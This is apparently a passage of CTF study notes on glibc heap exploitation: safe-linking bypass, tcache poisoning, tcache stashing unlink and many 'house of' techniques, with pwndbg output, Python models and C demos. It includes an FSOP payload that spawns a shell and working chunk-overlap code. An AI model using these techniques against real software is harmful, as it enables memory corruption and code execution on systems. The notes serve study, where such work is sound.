07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> bins
tcachebins
empty
fastbins
empty
unsortedbin
all: 0x61107b3f7c00 —▸ 0x73ccc601ace0 (main_arena+96) ◂— 0x61107b3f7c00
smallbins
empty
largebins
empty
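
The checks that the final delete(5) has to pass can be replayed on the values shown in the dumps above. The Python sketch below copies those memory words into a dictionary and applies a simplified version of the backward merge checks. The function name is made up, and only the checks discussed in this section are modeled.

```python
PREV_SIZE_OFF, SIZE_OFF, FD_OFF, BK_OFF = 0x0, 0x8, 0x10, 0x18
PREV_INUSE = 0x1
FLAG_MASK = 0x7

# Memory words taken from the pwndbg output above (address -> value).
heap = {
    0x61107B3F7C08: 0x551,            # old chunk 3 header: forged size
    0x61107B3F7C10: 0x61107B3F7290,   # old chunk 3 header: fd -> chunk 0
    0x61107B3F7C18: 0x61107B3F85E0,   # old chunk 3 header: bk -> chunk 6
    0x61107B3F72A8: 0x61107B3F7C00,   # chunk 0: bk after the off-by-null
    0x61107B3F85F0: 0x61107B3F7C00,   # chunk 6: fd after the off-by-null
    0x61107B3F8150: 0x550,            # chunk 5: forged prev_size
    0x61107B3F8158: 0x500,            # chunk 5: size with PREV_INUSE cleared
}


def backward_merge_ok(mem, freed):
    """Return True if freeing `freed` would pass the modeled checks."""
    if mem[freed + SIZE_OFF] & PREV_INUSE:
        return False                          # no backward merge at all
    prev_size = mem[freed + PREV_SIZE_OFF]
    p = freed - prev_size                     # chunk found via prev_size
    if (mem[p + SIZE_OFF] & ~FLAG_MASK) != prev_size:
        return False                          # corrupted size vs. prev_size
    fd, bk = mem[p + FD_OFF], mem[p + BK_OFF]
    return mem.get(fd + BK_OFF) == p and mem.get(bk + FD_OFF) == p


result = backward_merge_ok(heap, 0x61107B3F8150)
```

Without the two off-by-null writes, chunk 0's bk would still hold 0x61107b3f7c20 and the list check would fail.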

unsortedbin attack

decrypt_safe_linking

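Take free as an example: since glibc 2.32, freeing a chunk no longer stores the raw fd value in p->fd. The pointer goes through PROTECT_PTR when it is stored and through REVEAL_PTR when it is read back. Both are defined as macros: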

/* Safe-Linking:  
Use randomness from ASLR (mmap_base) to protect single-linked lists
of Fast-Bins and TCache. That is, mask the "next" pointers of the
lists' chunks, and also perform allocation alignment checks on them.
This mechanism reduces the risk of pointer hijacking, as was done with
Safe-Unlinking in the double-linked lists of Small-Bins.
It assumes a minimum page size of 4096 bytes (12 bits). Systems with
larger pages provide less entropy, although the pointer mangling
still works. */
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
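
The two macros can be mirrored in a few lines of Python. This is a minimal sketch, not glibc code: the function names and the sample addresses are made up for illustration, and decrypt_safe_linking assumes that the storage address and the protected pointer share all address bits above bit 15 (for example both sit in the same heap page) and that the pointer is 16-byte aligned.

```python
MASK64 = (1 << 64) - 1

def protect_ptr(pos: int, ptr: int) -> int:
    """PROTECT_PTR: XOR ptr with the address it is stored at, shifted right by 12."""
    return ((pos >> 12) ^ ptr) & MASK64

def reveal_ptr(pos: int, mangled: int) -> int:
    """REVEAL_PTR: the same XOR undoes the mangling when pos is known."""
    return protect_ptr(pos, mangled)

def decrypt_safe_linking(mangled: int) -> int:
    """Recover ptr from the mangled value alone (see the assumptions above)."""
    key = 0
    plain = 0
    for i in range(1, 6):
        bits = max(64 - 12 * i, 0)
        # The top bits recovered so far, shifted by 12, give the next key bits.
        plain = ((mangled ^ key) >> bits) << bits
        key = plain >> 12
    return plain

# Hypothetical addresses, for illustration only.
pos = 0x55555555B2A0   # where the fd/next field is stored
ptr = 0x55555555B310   # the pointer being protected
mangled = protect_ptr(pos, ptr)
```

When the protected pointer is NULL (the last chunk in a list), the stored value is simply pos >> 12, so shifting a leaked value left by 12 gives the page address of the chunk.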

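tcache stashing unlink attack

  • Effect: similar to unsortedbin attack, writes a libc address to an arbitrary address; can also give an allocation at an arbitrary address
  • Versions: glibc versions with tcache
  • Principle: when the chunk we need is served from a smallbin, malloc takes it out and then checks whether other chunks remain on that smallbin list. If some remain, the matching tcache bin still has free slots, and the tcache bin is not empty, the remaining chunks are stashed into the tcache bin. No doubly-linked-list integrity check is performed while chunks move from the small bin into the tcache bin, so corrupting the bk pointer of the chunk that is about to be stashed writes a libc address to an arbitrary address
  • Prerequisites:
    • chunks are allocated with calloc
    • the bk pointer of a smallbin chunk can be controlled
    • the smallbin holds at least two chunks
  • Attack steps (variant 1)
    • Leak a heap address first
    • Leave exactly 6 chunks in the tcache bin, so that it becomes full as soon as one smallbin chunk is stashed; this stops malloc from walking further along the tampered bk pointer
    • Create at least two chunks in the smallbin (either split an unsorted bin chunk so that the remainder goes to the small bin, or rely on the sorting done while malloc walks the unsorted bin, which moves small chunks into the small bin)
    • Use an overflow or UAF+edit to change the bk pointer of the chunk at the head of the smallbin list to target_addr-0x10
    • Take care not to corrupt the fd pointer while forging bk
    • Finally request a chunk whose size matches that smallbin list: the chunk at the tail of the list is returned, the chunk at the head is stashed into the tcache bin, and the stashing triggers the tcache stashing unlink attack
  • Attack steps (variant 2)
    • Leak a heap address first
    • Leave exactly 5 chunks in the tcache bin
    • Create at least two chunks in the smallbin
    • Use an overflow or UAF+edit to change the bk pointer of the chunk at the head of the smallbin list to fake_chunk_addr-0x10, near the address we want to allocate, then set fake_chunk_bk=target_addr-0x10
    • Take care not to corrupt the fd pointer while forging bk
    • Finally request a chunk whose size matches that smallbin list; the stashing triggers the tcache stashing unlink attack, yielding both an allocation of the fake chunk and an arbitrary-address write of a libc address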
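
The stashing step of variant 1 can be replayed on a toy memory model. The sketch below is a simplified rendition of the small-bin path in _int_malloc, not the real code: memory is a Python dict of 8-byte slots, the function name and all addresses are hypothetical, and only the fd/bk bookkeeping is modelled.

```python
FD, BK = 0x10, 0x18   # offsets of fd and bk from the chunk header (64-bit)

def stash_smallbin(mem, bin_addr, tcache_count, tcache_max=7):
    """Serve one chunk from the small bin, then stash the rest into tcache."""
    victim = mem[bin_addr + BK]              # chunk at the tail of the list
    bck = mem[victim + BK]
    if mem[bck + FD] != victim:              # the only integrity check
        raise RuntimeError("smallbin double linked list corrupted")
    mem[bin_addr + BK] = bck
    mem[bck + FD] = bin_addr
    stashed = []
    while tcache_count < tcache_max and mem[bin_addr + BK] != bin_addr:
        tc_victim = mem[bin_addr + BK]
        bck = mem[tc_victim + BK]            # attacker-controlled bk
        mem[bin_addr + BK] = bck
        mem[bck + FD] = bin_addr             # unchecked write of a libc address
        stashed.append(tc_victim)
        tcache_count += 1
    return victim, stashed, tcache_count

# Hypothetical addresses: the bin header, two small-bin chunks, the write target.
BIN, C0, C1, TARGET = 0x7FFFF7E1AD00, 0x55555555B000, 0x55555555B100, 0x404060
mem = {BIN + FD: C1, BIN + BK: C0,           # C1 is the list head, C0 the tail
       C1 + FD: C0, C1 + BK: BIN,
       C0 + FD: BIN, C0 + BK: C1}
mem[C1 + BK] = TARGET - 0x10                 # corrupt bk of the head chunk, keep fd
victim, stashed, count = stash_smallbin(mem, BIN, tcache_count=6)
```

With 6 entries already in the tcache bin, the loop runs exactly once, so the forged bk is followed for a single write and never dereferenced again.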

largebin attack

tcache poisoning

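Overwrite the fd pointer of the attack chunk that sits in the tcache bin so that it points to the address to be controlled; allocating chunks of the same size as the attack chunk then returns that address (the second allocation returns the target). Newer versions XOR-mangle the pointer, so the value written must be mangled in the same way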
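
The value to write into fd can be computed as follows. This is a sketch under assumptions: poisoned_fd is a hypothetical helper name, entry_addr is the address where the fd/next field of the freed chunk is stored, and the addresses in the example are made up. The alignment test reflects the alignment check that safe-linking glibc versions apply when the entry is taken out of the tcache.

```python
def poisoned_fd(entry_addr: int, target: int, safe_linking: bool = True) -> int:
    """Return the value to store in the freed chunk's fd so that tcache yields target."""
    if not safe_linking:
        return target                      # older glibc: plain pointer
    if target & 0xF:
        raise ValueError("target must be 16-byte aligned with safe-linking")
    return (entry_addr >> 12) ^ target     # same XOR as PROTECT_PTR

# Hypothetical addresses, for illustration only.
value = poisoned_fd(0x55555555B2A0, 0x7FFFF7E1B000)
```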

house of spirit

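  • Versions: 2.23 and later
  • Goal: gain arbitrary write over a chosen memory region
  • Method: forge a chunk in that memory region, get this memory (which is not a real chunk) freed into the bins, then malloc it back to obtain the write
  • Forged layout:
    • fake_chunk
      • prev_size: no requirement
      • size
        • N->0
        • M->0
        • P->0
        • the address of the prev_size field (the chunk start) is 16-byte aligned (64-bit)
        • size<0x80
        • size is 16-byte aligned (64-bit)
      • fd, bk, data: no requirement
    • next_chunk
      • prev_size: no requirement
      • 2*SIZE_SZ<size<128KB
      • size is 16-byte aligned (64-bit)
  • Prerequisites
    • The address passed to free can be controlled, for example through an overflow
  • Notes
    • Watch for counters in the challenge
    • If several places can host the fake chunk, pick the one that helps the later stages.
    • Pay attention to the size field of the fake chunk and the size field of the next chunk.
    • Also mind the program logic: if the program keeps freeing after fake_chunk has been freed, problems may arise; in that case write suitable data into fake_chunk to get past the program logic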

house of Einherjar

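  • Versions: 2.23 and later
  • Goal: gain arbitrary write over a chosen memory region
  • Method: forge a chunk in that memory region, use an off-by-one to trigger backward consolidation so that the merged chunk pointer points at the fake chunk; the next malloc then gives arbitrary write over the fake chunk
  • Forged layout:
    • fake_chunk
      • prev_size = chunk1_size
      • size
        • N->0
        • M->0
        • P->0
        • the address of the prev_size field (the chunk start) is 16-byte aligned (64-bit)
        • size = chunk1_size
      • fd, bk, fd_nextsize, bk_nextsize = fake_chunk_prev_size_addr
    • chunk0
    • chunk1
      • prev_size = chunk1_addr-fake_chunk_addr
      • N->0
      • M->0
      • P->0
      • size is a multiple of 0x100 (size=0 is also allowed)
  • Prerequisites
    • off-by-one or off-by-null
    • The heap address and the fake chunk address are known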

house of force

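  • Versions: 2.23~2.29
  • Goal: gain arbitrary write over a chosen memory region
  • Method: overwrite the size of the top chunk with a huge value, request a possibly huge chunk (spanning from the heap address to the address to modify) so that the top chunk pointer is moved to target; the next malloc then gives arbitrary write at target
  • Attack steps:
    • Use an overflow to set the size field of the top chunk to -1
    • Request a chunk of a specific size (it may be negative)
      • req=dest - old_top_prev_size_addr - 4*sizeof(long)
    • Allocate once more to obtain arbitrary write over the chosen memory
  • Prerequisites
    • A heap overflow that reaches the size of the top chunk
    • The heap address and the destination address are known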
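
The request-size formula above can be checked with a little unsigned arithmetic. The sketch assumes a 64-bit target, a 16-byte-aligned dest, and a simplified request2size that ignores the MINSIZE floor; the helper names and the sample addresses are hypothetical.

```python
MASK64 = (1 << 64) - 1
SIZE_SZ = 8
MALLOC_ALIGN_MASK = 0xF

def house_of_force_request(dest: int, old_top: int) -> int:
    """req = dest - old_top - 4*sizeof(long), as an unsigned 64-bit value."""
    return (dest - old_top - 4 * SIZE_SZ) & MASK64

def request2size(req: int) -> int:
    """Simplified glibc padding of a request to a chunk size (no MINSIZE floor)."""
    return ((req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) & MASK64

def top_after_malloc(old_top: int, req: int) -> int:
    """Address of the top chunk header after serving req from the top chunk."""
    return (old_top + request2size(req)) & MASK64

# Hypothetical addresses: top chunk header on the heap, target in .bss.
old_top, dest = 0x602110, 0x601080
req = house_of_force_request(dest, old_top)
new_top = top_after_malloc(old_top, req)
```

The next malloc returns new_top + 0x10, which is exactly dest in this example.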

house of lore

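  • Versions: 2.23~2.31

  • Goal: gain arbitrary write over a chosen memory region

  • Method: forge a chunk and a helper chunk in that memory region, use a UAF to modify the bk pointer of a smallbin chunk so that fake_chunk is linked into the smallbin; malloc from the smallbin, then malloc again to obtain arbitrary write over the fake chunk

  • Forged layout:

    • fake_chunk_1
      • fd = small_chunk_1_prev_size_addr
      • bk = fake_chunk_2_prev_size_addr
    • fake_chunk2
      • fd = fake_chunk_1_prev_size_addr
  • Implementation:

    • Allocate a chunk in the smallbin range (victim) and forge fake_chunk_1 and fake_chunk_2
    • Free victim, allocate a larger chunk (which sorts victim into the smallbin), then set victim->bk to fake_chunk_1_prev_size_addr
    • Allocate a chunk of the same size as victim; this links fake_chunk into the smallbin and triggers (smallbin->bk = victim->bk=stack_buffer1_addr)
    • Allocate another chunk of the same size as victim to obtain fake_chunk_1
  • Prerequisites

    • UAF
    • The heap address is known, and possibly other addresses as well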
  • Step 1

  • Step 2

  • Step 3

  • Step 4

house of orange

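  • Versions: 2.23~2.26
  • Effect: arbitrary function/command execution
  • Characteristic: no free required
  • Procedure:
    • First tamper with the size of the top chunk, for example through an overflow
    • Then request a chunk larger than the size of the top chunk
    • The old top chunk is thereby placed into the unsortedbin
  • Forged layout:
    • nb denotes the requested chunk size
    • MINSIZE<old_top_size<nb+MINSIZE
    • the prev_inuse bit of old_top_size is 1
    • (old_top_size+old_top)&0xfff=0x000
    • nb<0x20000
  • unsortedbin attack
    • Writes a very large number (main_arena+88 or main_arena+96) to a chosen address
    • How:
      • Write target_addr-0x10 into the bk pointer of the chunk at the tail of the unsortedbin
    • Once the unsortedbin attack is done, chunks can no longer be obtained from the unsortedbin
  • FSOP
    • Principle:
      • Tamper with _IO_list_all and _chain to hijack the IO_FILE structure so that it sits in memory we control. FSOP then relies on _IO_flush_all_lockp, which flushes every file stream on the _IO_list_all list, i.e. performs an fflush on each stream, and fflush eventually calls _IO_overflow in the vtable
      • Since the IO_FILE structure sits in memory we control, we also control the vtable. Change the _IO_overflow entry in the vtable to the address of system; the first argument of this function is the address of the IO_FILE structure, so set the flags member of the IO_FILE structure to the string /bin/sh. A shell is obtained once _IO_flush_all_lockp is triggered, which happens when exit is called, when libc runs its abort path, or when the program returns from main
    • Layout
      • Overwrite _IO_list_all with the address main_arena+88. The chain field lives at offset 0x68 from the start of the structure, so the address of the next IO_FILE structure is read from main_arena+88+0x68, which happens to be the smallbin slot for size 0x60
      • Put a chunk on the smallbin list for size 0x60; once _IO_list_all has been overwritten with main_arena+88, that smallbin chunk becomes the IO_FILE structure,
      • Because this memory is under our control, forge the vtable field and the rest of the layout to finally get a shell
    • Check bypass
      • mode=0
      • _IO_write_ptr=1
      • _IO_write_base=0
      • _flag=/bin/sh
    • The success rate is only 50%
    • From glibc-2.24 on a vtable check was added, but the _IO_str_jumps structure can still be used for exploitation
    • The data for the unsortedbin attack and for the FSOP attack are built into a single payload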
payload=b'f'*0x400
payload+=p64(0)+p64(0x21)
payload+=p64(sys_addr)+p64(0)
payload+=b'/bin/sh\x00'+p64(0x61) #old top chunk prev_size & size; prev_size doubles as the _flags field of the fake file
payload+=p64(0)+p64(io_list_all-0x10) #old top chunk fd & bk
payload+=p64(0)+p64(1)#_IO_write_base & _IO_write_ptr
payload+=p64(0)*7
payload+=p64(leak_heap+0x430)#chain->old top chunk addr
payload+=p64(0)*13
payload+=p64(leak_heap+0x508)#vtable
payload+=p64(0)+p64(0)+p64(sys_addr)#DUMMY finish overflow

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
     || (_IO_vtable_offset (fp) == 0
         && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                              > fp->_wide_data->_IO_write_base))
     )
    && _IO_OVERFLOW (fp, EOF) == EOF)
  result = EOF;
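
The constraints on the forged top chunk size listed under house of orange can be turned into a small checker. This is a sketch, not glibc code: the helper names and the sample heap address are hypothetical, MINSIZE is taken as 0x20 and the page size as 0x1000 (64-bit defaults), and the lower bound uses >= as in the sysmalloc assertion.

```python
MINSIZE = 0x20
PAGE = 0x1000
MMAP_THRESHOLD = 0x20000

def forged_top_size(real_top_size: int) -> int:
    """Keep only the page offset of the real size and set PREV_INUSE."""
    return ((real_top_size & (PAGE - 1)) & ~0x7) | 1

def top_size_ok(old_top: int, fake_size: int, nb: int) -> bool:
    """Check the conditions needed for the old top chunk to be freed."""
    size = fake_size & ~0x7
    return (size >= MINSIZE
            and (fake_size & 1) == 1               # prev_inuse bit set
            and (old_top + size) % PAGE == 0       # end of top is page-aligned
            and size < nb + MINSIZE                # request cannot be served
            and nb < MMAP_THRESHOLD)               # request does not go to mmap

# Hypothetical heap state: top chunk at 0x555555559410 with size 0x20bf1.
old_top = 0x555555559410
fake = forged_top_size(0x20BF1)
```

Because the real top chunk already ends on a page boundary, keeping the low 12 bits of its size preserves the alignment condition automatically.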

house of rabbit

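  • Versions: 2.23~2.31
  • Goal: gain arbitrary write over a chosen memory region
  • Core idea: use fastbin consolidation to legitimize a fake chunk sitting in the fastbin
  • Method:
    • Modify fd
      • Allocate chunk A (fastbin) and chunk B (smallbin)
      • Free chunk A and modify A->fd to point to address X
      • Free chunk B so that the fake chunk is placed into the unsortedbin
      • Trigger malloc_consolidate, for example by allocating a sufficiently large chunk, so that the fake chunk moves into the matching smallbin/largebin
      • Take the fake chunk out and read or write it
    • Overlapping chunks
  • Prerequisites
    • UAF
    • The fd or size field of a fastbin chunk is writable
    • Allocations larger than 0x400 are possible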

house of roman

  • Versions: 2.23~2.29
  • Goal: getshell
  • Method:
    • Step 1
      • Build the chunks
        • chunk_0, size=0x70
          • fastbin_victim
          • UAF
        • chunk_1, size=0x90
          • makes chunk_2 page-aligned
        • chunk_2, size=0x90
          • main_arena_use
          • unsortedbin
        • chunk_3, size=0x70
          • relative_offset_heap
          • used to write a relative address
      • free(chunk_2)
      • malloc(0x60)
        • chunk_2->chunk_2_1(0x70,fake_libc_chunk)+chunk_2_2(0x20,leftover_main,unsortedbin)
      • free(chunk_3)+free(chunk_0), both go into the fastbin
      • edit(chunk_0->fd=fake_libc_chunk_prev_size_addr)
      • edit(fake_libc_chunk->fd=__malloc_hook-0x23)
        • brute force
      • malloc(0x60)*3
    • Step 2
      • malloc(chunk_4,size=0x90)+malloc(0x30)
      • free(chunk_4)
      • edit(chunk_4->bk=__malloc_hook-0x10)
      • malloc(malloc_hook_chunk,size=0x90)
      • edit(malloc_hook_chunk->fd=ogg_addr)
  • Prerequisites
    • UAF
    • No address leak required
    • Brute force of 12 bits, 1/4096

house of storm

  • Versions: 2.23~2.29
  • Goal: arbitrary address write
  • Forged layout
    • unsorted_bin->fd = 0
    • unsorted_bin->bk = fake_chunk
    • large_bin->fd = 0
    • large_bin->bk = fake_chunk+8
    • large_bin->fd_nextsize = 0
    • large_bin->bk_nextsize = fake_chunk - 0x18 -5
  • Method:
    • chunk_1, size=0x410
    • chunk_2, size=0x30
    • chunk_3, size=0x420
    • chunk_4, size=0x30
    • chunk_5, size=0x30
    • chunk_6, size=0x30
    • free(chunk_1)+free(chunk_3)+free(chunk_5)
    • malloc(chunk_5)
    • malloc(chunk_3)+free(chunk_3)
    • edit(chunk_3->bk=__malloc_hook-0x50)
    • edit(chunk_1->bk=__malloc_hook-0x50+8)
    • edit(chunk_1->bk_nextsize=__malloc_hook-0x50-0x18-5)
    • malloc(0x48)(__malloc_hook_chunk)
    • edit(__malloc_hook_chunk+0x40=ogg_addr)
    • malloc->getshell
  • Prerequisites
    • UAF
    • Both unsortedbin attack and largebin attack are available

house of corrosion

  • Versions: 2.23 and later
  • Goal: arbitrary address read/write, and moving a value from one arbitrary address to another
  • Forged layout
    • chunk size = (target_addr - &main_arena.fastbinsY) x 2 + 0x20
  • Method:
    • Read target_message from target_addr
      • Free fastbin chunk A into target_addr so that A->fd points to target_message
    • Write target_message to target_addr
      • malloc(A,size=chunk size)
      • unsortedbin attack change global_max_fast
      • free(A)
      • Set A->fd to target_message
      • malloc(A)
    • Move the target_message stored at attack_addr to target_addr
      • src_size=(attack_addr-fastbinY)*2+0x20
      • dst_size=(target_addr-fastbinY)*2+0x20
      • malloc(A,size=dst_size)
      • malloc(B,size=dst_size)
      • free(B)
      • free(A)
      • unsortedbin attack change global_max_fast
      • Make the fd of chunk A (the chunk the slot's fd points to) point to A itself
      • malloc(A), edit(A->size=src_size), free(A)
      • A has now been linked in and its fd pointer holds target_message
      • edit(A->size=dst_size), then malloc(A) so that target_message lands in target_addr
  • Prerequisites
    • UAF, heap overflow
    • No address leak required, brute force 1/16
    • Allocations of arbitrary size
    • global_max_fast can be modified
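
The chunk-size formula under house of corrosion follows from the fastbin index calculation: each 8-byte fastbinsY slot corresponds to a 0x10 step in chunk size, starting at 0x20. A minimal sketch, with hypothetical helper names and a made-up fastbinsY address:

```python
def corrosion_chunk_size(target_addr: int, fastbinsY_addr: int) -> int:
    """Chunk size whose fastbin slot lands exactly on target_addr."""
    delta = target_addr - fastbinsY_addr
    if delta < 0 or delta % 8:
        raise ValueError("target must sit at an 8-byte slot above fastbinsY")
    return delta * 2 + 0x20

def slot_for_size(size: int, fastbinsY_addr: int) -> int:
    """Inverse mapping: address of the slot used by a chunk of this size."""
    return fastbinsY_addr + (size - 0x20) // 2

# Hypothetical address of main_arena.fastbinsY, for illustration only.
FASTBINSY = 0x7FFFF7DD1B28
size = corrosion_chunk_size(FASTBINSY + 0x1C90, FASTBINSY)
```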

house of husk

  • Versions: 2.23~2.35
  • Goal: backdoor or getshell
  • Forged layout
    • __printf_function_table!=NULL
    • __printf_arginfo_table=control_addr
    • __printf_arginfo_table[spec]=backdoor_addr
  • Call order:
    • printf->vprintf->(if __printf_function_table!=NULL)printf_positional->__parse_one_specmb->(*__printf_arginfo_table[spec->info.spec])
  • Method:
    • Leak libc through the unsortedbin, then use unsortedbin attack to overwrite global_max_fast
  • Prerequisites
    • UAF, heap overflow
    • Allocations of arbitrary size
    • global_max_fast can be modified
  • printf:
    • __vfprintf_internal
      • buffered_vfprintf
    • printf_positional
      • __parse_one_specmb
        • (*__printf_arginfo_table[spec->info.spec])
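
Since __printf_arginfo_table is indexed by the conversion character, the forged table only needs one pointer at offset ord(spec)*8. The sketch below builds such a table; fake_arginfo_table and the handler address are hypothetical, and a 64-bit little-endian target with a 256-entry table is assumed.

```python
import struct

def fake_arginfo_table(spec: str, handler: int) -> bytes:
    """256 pointer slots, with the slot for the conversion character set."""
    table = bytearray(0x100 * 8)
    struct.pack_into("<Q", table, ord(spec) * 8, handler)
    return bytes(table)

# Hypothetical backdoor address; triggered by a later printf("%s", ...).
table = fake_arginfo_table("s", 0x401256)
```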

house of mind

house of muney

house of rusk

house of crust

house of io

house of botcake

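Free a chunk into the unsorted bin the first time and into the tcache bin the second time to build a chunk overlap. This gives a double free inside the tcache, which makes tcache poisoning easy for follow-up attacks

Pick a suitable size (larger than the largest fastbin size, no larger than the largest tcache size). First malloc 7 chunks that will later fill the tcache, then malloc a chunk prev used for consolidation and a victim chunk of the same size as the previous 7, and finally malloc a chunk of any size to separate them from the top chunk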

void* chunks[7];  
for(int i=0; i<7; i++){
chunks[i]=malloc(0x80);
}
void* prev=malloc(0x80);
void* victim=malloc(0x80);
malloc(0x10);

Free the first 7 chunks to fill the tcache; then free victim and prev, in that order, which consolidates prev with victim

for(int i=0; i<7; i++){  
free(chunks[i]);
}
free(victim);
free(prev);

malloc a chunk of the same size to free up one slot in the tcache bin

malloc(0x80);

Free victim again; this time victim goes into the tcache, completing the double free

free(victim);

malloc a chunk of suitable size (larger than max(prev, victim) and no larger than prev+victim), then malloc a chunk of the same size as victim; these two chunks now overlap.

char* a=malloc(0x100);  
char* b=malloc(0x80);
assert(a+0x100>b);

house of water

  • Usable when there is no show function, provided a UAF (edit after free) exists and very large chunks can be allocated

how2heap demo

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main(){
void *_ = NULL;
setbuf(stdin,NULL);
setbuf(stdout,NULL);
setbuf(stderr,NULL);

//step1: allocate chunks of 0x3d8 and 0x3e8 and free them in turn, forging a size of 0x10001 inside tcache_perthread_struct (at offset 0x88)
void *fake_size_lsb = malloc(0x3d8);
void *fake_size_msb = malloc(0x3e8);
free(fake_size_lsb);
free(fake_size_msb);

void *metadata = (void *)((long)fake_size_lsb & ~(0xfff));

//allocate the 7 chunks used to fill the 0x90 tcache bin, so that 0x90-sized chunks freed afterwards go into the unsortedbin
void *x[7];
for(int i = 0 ; i < 7 ; i ++){
x[i] = malloc(0x88);
}

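//allocate three chunks separated by guard chunks that prevent consolidation; all three will end up in the unsortedbin. Then allocate a huge 0xf000 chunk as padding up to 0x10001, so that the 0x10001 in tcache_perthread_struct mentioned above is a valid size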
void *unsorted_start = malloc(0x88);
_ = malloc(0x18);
void *unsorted_middle = malloc(0x88);
_ = malloc(0x18);
void *unsorted_end = malloc(0x88);
_ = malloc(0x18);
_ = malloc(0xf000);

//allocate a 0x20 chunk and forge the prev_size and the size of the next chunk: 0x20
void *end_of_fake = malloc(0x18);
*(long *)end_of_fake = 0x10000;
*(long *)(end_of_fake + 0x8) = 0x20;

//fill the tcache bin
for(int i = 0 ; i < 7 ; i ++){
free(x[i]);
}

//set up a 0x31 chunk just above unsorted_start and free it; entering the tcache bin writes a verification key that overwrites the original size of unsorted_start, so the size has to be restored
*(long *)(unsorted_start - 0x18) = 0x31;
free(unsorted_start - 0x10);
*(long *)(unsorted_start - 0x8) = 0x91;

//set up a 0x21 chunk just above unsorted_end and free it; entering the tcache bin writes a verification key that overwrites the original size of unsorted_end, so the size has to be restored
*(long *)(unsorted_end - 0x18) = 0x21;
free(unsorted_end - 0x10);
*(long *)(unsorted_end - 0x8) = 0x91;

//in tcache_perthread_struct the 0x20 entry is the first tcache bin slot and the 0x30 entry is the second, so these two addresses sit right below the 0x10001 value. In other words, if the 0x10001 chunk entered a bin, its fd pointer would point to unsorted_end and its bk pointer to unsorted_start

//free the three chunks; the unsortedbin becomes: unsorted_start->unsorted_middle->unsorted_end
free(unsorted_end);
free(unsorted_middle);
free(unsorted_start);

//point the fd of unsorted_start at fake_chunk and the bk of unsorted_end at fake_chunk
*(unsigned long *)unsorted_start = (unsigned long)(metadata+0x80);
*(unsigned long *)(unsorted_end+0x8) = (unsigned long)(metadata+0x80);

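//the unsortedbin is now unsorted_start->fake_chunk->unsorted_end
//splitting: if the unsortedbin holds no chunk of a suitable size, the chunks are sorted in order into the smallbin or largebin and the split happens afterwards; here unsorted_start and unsorted_end clearly go into the smallbin while fakechunk goes into the largebin
//so it is enough to request a chunk smaller than 0x10000: once everything is sorted into its bin, fakechunk is the only chunk in the largebin, so libc addresses appear at two positions, and those two positions become two tcache bin entries
//after that, requesting a tcache chunk of the matching size returns a chunk located in libc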
void *meta_chunk = malloc(0x288);
assert(meta_chunk == (metadata+0x90));
}
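
Next, attack _IO_FILE: set the flags to 0xfbad1800 so that the stream flushes its buffer and prints the contents. The three fields read_ptr, read_end and read_base can hold anything, so set them to 0, and adjust write_base, write_ptr and write_end; the stream then outputs the bytes from write_base to write_ptr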
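
A common way to realise this is a short partial overwrite of the stdout structure. The sketch below only builds the bytes; it assumes a 64-bit little-endian target and that the write starts at the _flags field of _IO_2_1_stdout_. The helper name and the choice of the low byte are illustrative, not taken from a specific challenge.

```python
import struct

def stdout_leak_payload(write_base_low_byte: int = 0x00) -> bytes:
    """_flags, three zeroed read pointers, then the low byte of _IO_write_base."""
    payload = struct.pack("<Q", 0xFBAD1800)   # _flags
    payload += struct.pack("<QQQ", 0, 0, 0)   # _IO_read_ptr, _IO_read_end, _IO_read_base
    payload += bytes([write_base_low_byte])   # partial overwrite of _IO_write_base
    return payload

payload = stdout_leak_payload(0x00)
```

Lowering only the low byte of _IO_write_base keeps the pointer inside libc, so the next output call prints libc memory between the new write_base and write_ptr.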

After leaking libc, house of apple can be used

house of tangerine(house of orange plus)

house of minho

IO_FILE

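IO data structures

For an LBA disk, data must be read and written block by block. If every read or write call handled only a small amount of data, the cost to the system would be very high, so the C library uses a buffer. The buffer therefore exists to reduce the cost of operating external hardware; everything is designed around the external hardware.

  1. Reading from external hardware: to reduce cost, a whole "block" of data is read from the hardware at once and placed in a buffer; the target then consumes it from the front as needed, and the hardware is read again only after everything has been consumed. This buffer is called the input buffer.
  2. Writing to external hardware: to reduce cost, data is not written out as soon as it appears. It is first copied from the source into a buffer, and the buffer is written to the hardware in one go once it is full. This buffer is called the output buffer.

Taking reads from external hardware first, the input buffer needs a pointer to its start (base), a pointer to its end (end), and a pointer to how much has been consumed so far (ptr). When ptr == end, everything in the input buffer has been read and new data must be fetched from the hardware. Likewise, for writes to external hardware, the output buffer needs a start (base), an end (end), and a pointer to how much has been written so far (ptr). When ptr == end, the output buffer is full and can be written to the hardware.

This looks clear, but a few points are easy to mix up. A buffer stores data; input and output move data in opposite directions, yet both serve the same party, the external device, so the useful part of the data differs.

  1. For the input buffer, ptr to end is useful data and base to ptr is data already consumed.
  2. For the output buffer, base to ptr is the content to be written to the hardware (useful data) and ptr to end is free space.
  3. The two differ in where they end.
    1. For the input buffer, data read from disk may not fill the whole buffer, so _IO_buf_end != _IO_read_end. The input buffer uses _IO_read_end to determine its end.
    2. For the output buffer, the end of the buffer is the end of the output area, _IO_buf_end == _IO_write_end. The output buffer usually uses _IO_buf_end to determine its end.

Although the input and output buffers serve different purposes, both are just a block of memory. A device may be both readable and writable, so to save space a single buffer can be defined that acts as the input buffer when reading and as the output buffer when writing. That gives 8 pointers.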

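char *_IO_buf_base;    // start address of the buffer
char *_IO_buf_end;   // end address of the buffer
char *_IO_read_base; // start address of the input buffer
char *_IO_read_ptr;   // current input position
char *_IO_read_end; // end address of the input buffer
char *_IO_write_base; // start address of the output buffer
char *_IO_write_ptr; // current output position
char *_IO_write_end; // end address of the output buffer

Reading from a file: the program reads a batch of data from fd into the buffer (_IO_buf_base to _IO_buf_end). _IO_read_ptr marks how far data has been handed to target, i.e. _IO_read_ptr to _IO_read_end is data not yet written to target. When _IO_read_ptr == _IO_read_end, the input buffer holds no more usable data and data must be read from the file again.

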